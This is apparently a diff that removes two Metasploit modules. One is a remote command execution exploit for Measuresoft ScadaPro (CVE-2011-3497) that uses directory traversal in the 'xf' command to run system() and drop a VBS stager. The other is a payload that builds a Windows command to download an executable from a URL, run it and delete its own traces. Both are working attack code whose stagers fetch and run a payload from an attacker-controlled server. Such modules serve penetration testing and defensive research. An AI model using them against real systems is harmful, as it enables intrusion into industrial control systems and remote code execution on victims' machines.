@ -1,126 +0,0 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Measuresoft ScadaPro Remote Command Execution',
'Description' => %q{
This module allows remote attackers to execute arbitrary commands on the
affected system by abusing via Directory Traversal attack when using the
'xf' command (execute function). An attacker can execute system() from
msvcrt.dll to upload a backdoor and gain remote code execution. This
vulnerability affects version 4.0.0 and earlier.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Luigi Auriemma', # Initial discovery/poc
'mr_me <steventhomasseeley[at]gmail.com>', # msf
'TecR0c <tecr0c[at]tecninja.net>', # msf
],
'References' =>
[
[ 'CVE', '2011-3497'],
[ 'OSVDB', '75490'],
[ 'BID', '49613'],
[ 'URL', 'http://aluigi.altervista.org/adv/scadapro_1-adv.txt'],
[ 'URL', 'http://us-cert.gov/control_systems/pdf/ICS-ALERT-11-256-04.pdf'],
# seemed pretty accurate to us ;)
[ 'URL', 'http://www.measuresoft.net/news/post/Inaccurate-Reports-of-Measuresoft-ScadaPro-400-Vulnerability.aspx'],
],
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
},
'Platform' => 'win',
'Targets' =>
[
# truly universal
[ 'Automatic', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 16 2011'))
register_options(
[
Opt::RPORT(11234),
OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),
])
end
# couldn't generate a vbs or exe payload and then use the wF command
# as there is a limit to the amount of data to write to disk.
# so we just write out a vbs script like the old days.
def build_vbs(url, stager_name)
name_xmlhttp = rand_text_alpha(2)
name_adodb = rand_text_alpha(2)
tmp = "#{@temp_folder}/#{stager_name}"
vbs = "echo Set #{name_xmlhttp} = CreateObject(\"Microsoft.XMLHTTP\") "
vbs << ": #{name_xmlhttp}.open \"GET\",\"http://#{url}\",False : #{name_xmlhttp}.send"
vbs << ": Set #{name_adodb} = CreateObject(\"ADODB.Stream\") "
vbs << ": #{name_adodb}.Open : #{name_adodb}.Type=1 "
vbs << ": #{name_adodb}.Write #{name_xmlhttp}.responseBody "
vbs << ": #{name_adodb}.SaveToFile \"#{@temp_folder}/#{@payload_name}.exe\",2 "
vbs << ": CreateObject(\"WScript.Shell\").Run \"#{@temp_folder}/#{@payload_name}.exe\",0 >> #{tmp}"
return vbs
end
def on_request_uri(cli, request)
if request.uri =~ /\.exe/
print_status("Sending 2nd stage payload")
return if ((p=regenerate_payload(cli)) == nil)
data = generate_payload_exe( {:code=>p.encoded} )
send_response(cli, data, {'Content-Type' => 'application/octet-stream'} )
return
end
end
def exploit
# In order to save binary data to the file system the payload is written to a .vbs
# file and execute it from there.
@payload_name = rand_text_alpha(4)
@temp_folder = "C:/Windows/Temp"
if datastore['SRVHOST'] == '0.0.0.0'
lhost = Rex::Socket.source_address('50.50.50.50')
else
lhost = datastore['SRVHOST']
end
payload_src = lhost
payload_src << ":#{datastore['SRVPORT']}#{datastore['URIPATH']}#{@payload_name}.exe"
stager_name = rand_text_alpha(6) + ".vbs"
stager = build_vbs(payload_src, stager_name)
path = "..\\..\\..\\..\\..\\windows\\system32"
createvbs = "xf%#{path}\\msvcrt.dll,system,cmd /c #{stager}\r\n"
download_execute = "xf%#{path}\\msvcrt.dll,system,start #{@temp_folder}/#{stager_name}\r\n"
print_status("Sending 1st stage payload...")
connect
sock.get_once()
sock.put(createvbs)
sock.get_once()
sock.put(download_execute)
handler()
disconnect
super
end
end

72
modules/payloads/singles/cmd/windows/download_exec_vbs.rb
View File

@ -1,72 +0,0 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module MetasploitModule
CachedSize = :dynamic
include Msf::Payload::Single
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'Windows Executable Download and Execute (via .vbs)',
'Description' => 'Download an EXE from an HTTP(S) URL and execute it',
'Author' => 'scriptjunkie',
'License' => BSD_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_CMD,
'Handler' => Msf::Handler::None,
'Session' => Msf::Sessions::CommandShell,
'PayloadType' => 'cmd',
'RequiredCmd' => 'wscript',
'Payload' =>
{
'Offsets' => { },
'Payload' => ''
}
))
register_options(
[
OptString.new('URL', [ true, "The pre-encoded URL to the executable" ]),
OptString.new('EXT', [ true, "The extension to give the saved file", "exe" ]),
OptBool.new('INCLUDECMD', [ true, "Include the cmd /q /c", false ]),
OptBool.new('DELETE', [ true, "Delete created .vbs after download", true ])
])
end
def generate
return super + command_string
end
def command_string
# It's already long. Keep variable names short.
vbsname = Rex::Text.rand_text_alpha(1+rand(2))
exename = Rex::Text.rand_text_alpha(1+rand(2))
xmlhttpvar = Rex::Text.rand_text_alpha(1+rand(2))
streamvar = Rex::Text.rand_text_alpha(1+rand(2))
command = ''
command << "cmd.exe /q /c " if datastore['INCLUDECMD']
# "start #{vbsname}.vbs" instead of just "#{vbsname}.vbs" so that the console window
# disappears quickly before the wscript libraries load and the file downloads
command << "cd %tmp%&echo Set #{xmlhttpvar}=CreateObject(\"Microsoft.XMLHTTP\"):"+
"#{xmlhttpvar}.Open \"GET\",\"#{datastore['URL']}\",False:"+
"#{xmlhttpvar}.Send:"+
"Set #{streamvar}=CreateObject(\"ADODB.Stream\"):"+
"#{streamvar}.Type=1:"+
"#{streamvar}.Open:"+
"#{streamvar}.Write #{xmlhttpvar}.responseBody:"+
"#{streamvar}.SaveToFile \"#{exename}.#{datastore['EXT']}\",2:"+
"CreateObject(\"WScript.Shell\").Run \"#{exename}.#{datastore['EXT']}\":"
command << "CreateObject(\"Scripting.FileSystemObject\").DeleteFile \"#{vbsname}.vbs\"" if datastore['DELETE']
command << " >#{vbsname}.vbs"+
"&start wscript #{vbsname}.vbs"
end
end